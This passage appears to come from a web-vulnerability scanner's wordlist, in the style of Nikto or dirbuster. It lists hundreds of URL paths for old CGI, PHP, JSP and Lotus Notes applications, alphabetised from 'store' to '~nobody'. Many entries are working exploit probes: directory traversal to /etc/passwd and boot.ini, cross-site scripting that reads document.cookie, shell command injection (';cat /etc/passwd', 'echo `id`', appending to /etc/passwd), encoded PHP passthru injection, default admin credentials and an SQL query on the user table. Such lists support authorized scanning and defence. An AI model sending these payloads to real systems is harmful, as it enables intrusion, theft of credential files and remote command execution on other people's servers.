store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
store/
store/agora.cgi?cart_id=
store/agora.cgi?cart_id=
store/agora.cgi?page=whatever33.html
store/index.cgi?page=../../../../../../../../etc/passwd
story.pl?next=../../../../../../../../../../etc
story.pl?next=../../../../../../../../../../etc/passwd%00
story/story.pl?next=../../../../../../../../../../etc/passwd%00
story/story.pl?next=../../../../../../../../../../passwd%00
streg.nsf
stronghold-info
stronghold-status
structure.sql
stsrc.nsf
style/
styles/
stylesheet/
stylesheets/
subir/
submit.php?subject=&story=&storyext=&op=Preview
submit?setoption=q&option=allowed_ips&value=255.255.255.255
sun/
sunshop.index.php?action=storenew&username=
super_stats/access_logs
super_stats/error_logs
support/
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
support/messages
supporter/index.php
supporter/index.php?t=ticketfiles&id=<script></script>
supporter/index.php?t=tickettime&id=<script></script>
supporter/index.php?t=updateticketlog&id=<script></script>
supporter/tupdate.php
surf/scwebusers
survey
survey.cgi
sw000.asp?|-|0|404_Object_Not_Found
swf
sws/admin.html
sws/manager.pl
sys/
syshelp/cscript/showfnc.stm?pkg=
syshelp/cscript/showfncs.stm?pkg=
syshelp/cscript/showfunc.stm?func=
syshelp/stmex.stm?foo=123&bar=
syshelp/stmex.stm?foo=
syslog.htm?%20
system/
sysuser/docmgr/create.stm?path=
sysuser/docmgr/edit.stm?name=
sysuser/docmgr/edit.stm?path=
sysuser/docmgr/ftp.stm?path=
sysuser/docmgr/htaccess.stm?path=
sysuser/docmgr/iecreate.stm?path=
sysuser/docmgr/iecreate.stm?template=../
sysuser/docmgr/ieedit.stm?name=
sysuser/docmgr/ieedit.stm?path=
sysuser/docmgr/ieedit.stm?url=../
sysuser/docmgr/info.stm?name=
sysuser/docmgr/info.stm?path=
sysuser/docmgr/mkdir.stm?path=
sysuser/docmgr/rename.stm?name=
sysuser/docmgr/rename.stm?path=
sysuser/docmgr/search.stm?path=
sysuser/docmgr/search.stm?query=
sysuser/docmgr/sendmail.stm?name=
sysuser/docmgr/sendmail.stm?path=
sysuser/docmgr/template.stm?path=
sysuser/docmgr/update.stm?name=
sysuser/docmgr/update.stm?path=
sysuser/docmgr/vccheckin.stm?name=
sysuser/docmgr/vccheckin.stm?path=
sysuser/docmgr/vccreate.stm?name=
sysuser/docmgr/vccreate.stm?path=
sysuser/docmgr/vchist.stm?name=
sysuser/docmgr/vchist.stm?path=
tablebuild.pl
talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
tar/
tarjetas/
tcb/files/auth/r/root
tcsh
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
technote/print.cgi
temp/
template/
templates/form_header.php?noticemsg=
temporal/
test
test-cgi.bat
test-cgi.exe?
test-cgi.tcl
test-cgi?/*
test-env
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
test.cgi
test.htm
test.html
test.nsf
test.php
test.php%20
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.txt
test/
test/info.php
test/jsp/Language.jsp
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/phpinfo.php
test/realPath.jsp
test/test.cgi
testcgi.exe
testcgi.exe?
testing/
tests/
texis.exe/?-dump
texis.exe/?-version
texis.exe/junk
texis/junk
texis/phine
texis/websearch/phine
textcounter.pl
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\">,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status\">,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session\">&button_url=/system/status/status,/system/status/moniter,/system/status/session
themes/mambosimple.php?detection=detected&sitename=
ticket.php?id=99999
tidfinder.cgi
tigvote.cgi
tinymsg.php
title.cgi
tmp/
tmp_view.php?file=/etc/passwd
today.nsf
tomcat-docs/index.html
tools/
topic/entete.php
topsitesdir/edit.php
tpgnrock
tpv/
trabajo/
trace.axd
traffic.cgi?cfg=../../../../../../../../etc/passwd
trafficlog/
transito/
tree
tree/
trees/
troops.cgi
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
tsweb/
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
ttforum/index.php
ttp://127.0.0.1:2301/
tutos/file/file_new.php
tutos/file/file_select.php
tvcs/getservers.exe?action=selects1
typo3/typo3/dev/translations.php
typo3conf/
typo3conf/database.sql
typo3conf/localconf.php
uifc/MultFileUploadHandler.php+
ultraboard.cgi
ultraboard.pl
unlg1.1
unlg1.2
upd/
update.dpgs
updates/
upload.asp
upload.cgi
upload.cgi+
upload.php?type=\"
uploader.php
uploadn.asp
uploadx.asp
uptime
url.jsp
urlcount.cgi?%3CIMG%20
urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
usage/
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
user.php?op=userinfo&uname=
user/
useraction.php3
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
userinfo.php?uid=1;
userlog.php
userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
userreg.nsf
users.lst
users.nsf
users.php?mode=profile&uid=<script>alert(document.cookie)</script>
users/
users/scripts/submit.cgi
ustats/
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
usuario/
usuarios/
utils/sprc.asp
utils/sprc.asp+
utm/admin
utm/utm_stat
vars.inc+
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vc30/
vchat/msg.txt
vfs/
vgn/ac/data
vgn/ac/delete
vgn/ac/edit
vgn/ac/esave
vgn/ac/fsave
vgn/ac/index
vgn/asp/MetaDataUpdate
vgn/asp/previewer
vgn/asp/status
vgn/asp/style
vgn/errors
vgn/jsp/controller
vgn/jsp/errorpage
vgn/jsp/initialize
vgn/jsp/jspstatus
vgn/jsp/jspstatus56
vgn/jsp/metadataupdate
vgn/jsp/previewer
vgn/jsp/style
vgn/legacy/edit
vgn/legacy/save
vgn/license
vgn/login
vgn/login/1,501,,00.html?cookieName=x--\>
vgn/performance/TMT
vgn/performance/TMT/Report
vgn/performance/TMT/Report/XML
vgn/performance/TMT/reset
vgn/ppstats
vgn/previewer
vgn/record/previewer
vgn/style
vgn/stylepreviewer
vgn/vr/Deleting
vgn/vr/Editing
vgn/vr/Saving
vgn/vr/Select
vider.php3
view-source
view-source?view-source
view_item?HTML_FILE=../../../../../../../../../../etc
view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
view_source.jsp
viewcvs.cgi/viewcvs/?cvsroot=
viewcvs.cgi/viewcvs/?cvsroot=
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
viewlogs.pl
viewpage.php?file=/etc/passwd
viewsource?/etc/passwd
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viralator.cgi
virgil.cgi
visadmin.exe
visitor.exe
vote.cgi
vpasswd.cgi
vpuserinfo.nsf
vq/demos/respond.pl?
vq/demos/respond.pl?
w-agora/
w3-msql
w3-sql
w3perl/admin
wa.exe
wais.pl
warez/
way-board.cgi?db=/etc/passwd%00
way-board/way-board.cgi?db=/etc/passwd%00
wbboard/profile.php
wbboard/reply.php
wconsole.dll
web-console/ServerInfo.jsp%00
web.config
web.nsf
web/
web800fo/
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
web_app/WEB-INF/webapp.properties
webaccess.htm
webaccess/access-options.txt
webadmin.nsf
webadmin/
webais
webalizer/
webamil/test.php
webamil/test.php?mode=phpinfo
webapp/admin/_pages/_bc4jadmin/
webbbs.cgi
webbbs.exe
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
webboard/
webcache/
webcache/webcache.xml
webcalendar/colors.php?color=
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
webcalendar/login.php
webcalendar/view_m.php
webcalendar/week.php?eventinfo=
webcalendar/week.php?user=\">
webcart-lite/
webcart-lite/config/import.txt
webcart-lite/orders/import.txt
webcart/
webcart/carts/
webcart/config/
webcart/config/clients.txt
webcart/orders/
webcart/orders/import.txt
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
webchat/register.php?register=yes&username=OverG&email=&email1=
webdata/
webdav/index.html
webdist.cgi?distloc=;cat%20/etc/passwd
webdriver
webfind.exe?keywords=01234567890123456789
webgais
webif.cgi
weblog/
weblogic
weblogs/
webmail/
webmail/blank.html
webmail/horde/test.php
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
webmail/lib/emailreader_execute_on_each_page.inc.php
webmail/src/read_body.php
webmap.cgi
webmaster_logs/
webnews.pl
webplus.exe?about
webplus?about
webplus?script=../../../../../../../../../../etc
webplus?script=../../../../../../../../../../etc/passwd
websendmail
website/
webspirs.cgi?sp.nextform=../../../../../../../../../../etc
webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
webstats/
webtools/bonsai/cvsblame.cgi?file=
webtools/bonsai/cvslog.cgi?file=*&rev=&root=
webtools/bonsai/cvslog.cgi?file=
webtools/bonsai/cvsquery.cgi?branch=&file=&date=
webtools/bonsai/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD
webtools/bonsai/showcheckins.cgi?person=
webtop/wdk/
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
webtop/wdk/samples/index.jsp
webuser.nsf
webutil.pl
webutils.pl
webwho.pl
welcome.nsf
wguest.exe
whatever.htr
whateverJUNK(4).html
where.pl?sd=ls%20/etc
whois.cgi?action=load&whois=%3Bid
whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
wikihome/action/conflict.php
windmail
windmail.exe
windows/
wksinst.nsf
word/
work/
wrap
wrap.cgi
ws_ftp.ini
wstats/
wusage/
www-sql
www-sql/
www/
wwwadmin.pl
wwwboard.cgi.cgi
wwwboard.pl
wwwboard/passwd.txt
wwwboard/wwwboard.cgi
wwwboard/wwwboard.pl
wwwjoin/
wwwlog/
wwwping/index.stm?wwwsite=
wwwstats.html
wwwstats.pl
wwwstats/
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
wwwwais
wx/s.dll?d=/boot.ini
x_stat_admin.php
xdk/
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
yabbse/Reminder.php
yabbse/Sources/Packages.php
z_user_show.php?method=showuserlink&class=&rollid=admin&x=3da59a9da8825&
zentrack/index.php
zipfiles/
zml.cgi?file=../../../../../../../../../../etc
zml.cgi?file=../../../../../../../../../../etc/passwd%00
zorum/index.php?method=<script>alert('Vulnerable')</script>
zsh
~/.asp
~/.aspx
~/.aspx?aspxerrorpath=null
~nobody/etc/passwd